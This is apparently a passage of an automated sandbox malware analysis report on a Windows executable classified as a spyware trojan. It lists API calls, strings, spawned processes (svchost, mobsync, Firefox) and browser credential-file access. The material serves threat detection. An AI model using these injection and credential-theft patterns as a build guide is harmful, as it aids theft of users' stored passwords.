Source: tfWjjV1LdT.exe, 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_246c2bf9-e
Source: tfWjjV1LdT.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a5dc350d-7
Source: tfWjjV1LdT.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_2eaa6f85-a

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C483 NtClose,	2_2_0042C483
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B60 NtClose,LdrInitializeThunk,	2_2_03872B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03872DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,	2_2_038735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874340 NtSetContextThread,	2_2_03874340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03874650 NtSuspendThread,	2_2_03874650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872B80 NtQueryInformationFile,	2_2_03872B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BA0 NtEnumerateValueKey,	2_2_03872BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BE0 NtQueryValueKey,	2_2_03872BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872BF0 NtAllocateVirtualMemory,	2_2_03872BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AB0 NtWaitForSingleObject,	2_2_03872AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AD0 NtReadFile,	2_2_03872AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872AF0 NtWriteFile,	2_2_03872AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F90 NtProtectVirtualMemory,	2_2_03872F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FA0 NtQuerySection,	2_2_03872FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FB0 NtResumeThread,	2_2_03872FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872FE0 NtCreateFile,	2_2_03872FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F30 NtCreateSection,	2_2_03872F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872F60 NtCreateProcessEx,	2_2_03872F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E80 NtReadVirtualMemory,	2_2_03872E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EA0 NtAdjustPrivilegesToken,	2_2_03872EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872EE0 NtQueueApcThread,	2_2_03872EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872E30 NtWriteVirtualMemory,	2_2_03872E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DB0 NtEnumerateKey,	2_2_03872DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872DD0 NtDelayExecution,	2_2_03872DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D00 NtSetInformationFile,	2_2_03872D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D10 NtMapViewOfSection,	2_2_03872D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872D30 NtUnmapViewOfSection,	2_2_03872D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CA0 NtQueryInformationToken,	2_2_03872CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CC0 NtQueryVirtualMemory,	2_2_03872CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872CF0 NtOpenProcess,	2_2_03872CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C00 NtQueryInformationProcess,	2_2_03872C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C60 NtCreateKey,	2_2_03872C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03872C70 NtFreeVirtualMemory,	2_2_03872C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873090 NtSetValueKey,	2_2_03873090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873010 NtOpenDirectoryObject,	2_2_03873010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038739B0 NtGetContextThread,	2_2_038739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D10 NtOpenProcessToken,	2_2_03873D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03873D70 NtOpenThread,	2_2_03873D70

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006FA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_006FA1EF

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006E8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_006E8310

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_006F51BD

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_0069E6A0	0_2_0069E6A0
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006BD975	0_2_006BD975
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_0069FCE0	0_2_0069FCE0
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006B21C5	0_2_006B21C5
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006C62D2	0_2_006C62D2
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_007103DA	0_2_007103DA
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006C242E	0_2_006C242E
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006B25FA	0_2_006B25FA
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006EE616	0_2_006EE616
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006A66E1	0_2_006A66E1
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006C878F	0_2_006C878F
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_00710857	0_2_00710857
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006C6844	0_2_006C6844
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006A8808	0_2_006A8808
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006F8889	0_2_006F8889
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006BCB21	0_2_006BCB21
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006C6DB6	0_2_006C6DB6
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006A6F9E	0_2_006A6F9E
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006A3030	0_2_006A3030
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006BF1D9	0_2_006BF1D9
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006B3187	0_2_006B3187
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_00691287	0_2_00691287
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006B1484	0_2_006B1484
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006A5520	0_2_006A5520
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006B7696	0_2_006B7696
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006A5760	0_2_006A5760
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006B1978	0_2_006B1978
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006C9AB5	0_2_006C9AB5
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_00717DDB	0_2_00717DDB
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006BBDA6	0_2_006BBDA6
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006B1D90	0_2_006B1D90
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_0069DF00	0_2_0069DF00
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006A3FE0	0_2_006A3FE0
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_00D54230	0_2_00D54230
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004183B3	2_2_004183B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402929	2_2_00402929
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402930	2_2_00402930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401200	2_2_00401200
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EAA3	2_2_0042EAA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FBF3	2_2_0040FBF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402DF0	2_2_00402DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DDF3	2_2_0040DDF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402590	2_2_00402590
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004165B3	2_2_004165B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE13	2_2_0040FE13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF43	2_2_0040DF43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF37	2_2_0040DF37
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384E3F0	2_2_0384E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039003E6	2_2_039003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FA352	2_2_038FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C02C0	2_2_038C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0274	2_2_038E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F41A2	2_2_038F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039001AA	2_2_039001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F81CC	2_2_038F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830100	2_2_03830100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DA118	2_2_038DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038C8158	2_2_038C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D2000	2_2_038D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383C7C0	2_2_0383C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03864750	2_2_03864750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840770	2_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385C6E0	2_2_0385C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03900591	2_2_03900591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840535	2_2_03840535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EE4F6	2_2_038EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E4420	2_2_038E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F2446	2_2_038F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F6BD7	2_2_038F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FAB40	2_2_038FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383EA80	2_2_0383EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038429A0	2_2_038429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390A9A6	2_2_0390A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03856962	2_2_03856962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038268B8	2_2_038268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0386E8F0	2_2_0386E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384A840	2_2_0384A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03842840	2_2_03842840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038BEFA0	2_2_038BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03832FC8	2_2_03832FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384CFE0	2_2_0384CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03882F28	2_2_03882F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03860F30	2_2_03860F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E2F30	2_2_038E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B4F40	2_2_038B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03852E90	2_2_03852E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FCE93	2_2_038FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEEDB	2_2_038FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FEE26	2_2_038FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840E59	2_2_03840E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03858DBF	2_2_03858DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0383ADE0	2_2_0383ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384AD00	2_2_0384AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DCD1F	2_2_038DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E0CB5	2_2_038E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03830CF2	2_2_03830CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03840C00	2_2_03840C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0388739A	2_2_0388739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F132D	2_2_038F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382D34C	2_2_0382D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038452A0	2_2_038452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B2C0	2_2_0385B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E12ED	2_2_038E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0384B1B0	2_2_0384B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387516C	2_2_0387516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0382F172	2_2_0382F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0390B16B	2_2_0390B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EF0CC	2_2_038EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038470C0	2_2_038470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F70E9	2_2_038F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF0E0	2_2_038FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF7B0	2_2_038FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F16CC	2_2_038F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885630	2_2_03885630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DD5B0	2_2_038DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039095C3	2_2_039095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7571	2_2_038F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FF43F	2_2_038FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03831460	2_2_03831460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FB80	2_2_0385FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B5BF0	2_2_038B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0387DBF9	2_2_0387DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFB76	2_2_038FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038DDAAC	2_2_038DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03885AA0	2_2_03885AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038E1AA3	2_2_038E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038EDAC6	2_2_038EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFA49	2_2_038FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7A46	2_2_038F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B3A6C	2_2_038B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038D5910	2_2_038D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849950	2_2_03849950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385B950	2_2_0385B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038438E0	2_2_038438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038AD800	2_2_038AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03841F92	2_2_03841F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFFB1	2_2_038FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD2	2_2_03803FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03803FD5	2_2_03803FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFF09	2_2_038FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03849EB0	2_2_03849EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0385FDC0	2_2_0385FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03843D40	2_2_03843D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F1D5A	2_2_038F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038F7D73	2_2_038F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038FFCF2	2_2_038FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_038B9C32	2_2_038B9C32

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03887E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0382B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 038BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03875130 appears 58 times
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: String function: 006B0AE3 appears 70 times
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: String function: 00697DE1 appears 36 times
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: String function: 006B8900 appears 42 times

Source: tfWjjV1LdT.exe, 00000000.00000003.2086505362.00000000038AD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs tfWjjV1LdT.exe
Source: tfWjjV1LdT.exe, 00000000.00000003.2085455684.00000000036B3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs tfWjjV1LdT.exe

Source: tfWjjV1LdT.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@9/8

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006FA06A GetLastError,FormatMessageW,

0_2_006FA06A

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006E81CB AdjustTokenPrivileges,CloseHandle,		0_2_006E81CB
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_006E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_006E87E1

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006FB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_006FB333

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_0070EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0070EE0D

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_007083BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_007083BB

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_00694E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00694E89

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

File created: C:\Users\user\AppData\Local\Temp\autE986.tmp

Jump to behavior

Source: tfWjjV1LdT.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mobsync.exe, 00000005.00000002.3895710577.0000000003052000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2495032582.000000000305D000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3895710577.0000000003081000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2492295108.0000000003031000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2492476241.0000000003052000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: tfWjjV1LdT.exe	Virustotal: Detection: 54%
Source: tfWjjV1LdT.exe	ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\tfWjjV1LdT.exe "C:\Users\user\Desktop\tfWjjV1LdT.exe"
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tfWjjV1LdT.exe"
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tfWjjV1LdT.exe"	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: profapi.dll	Jump to behavior
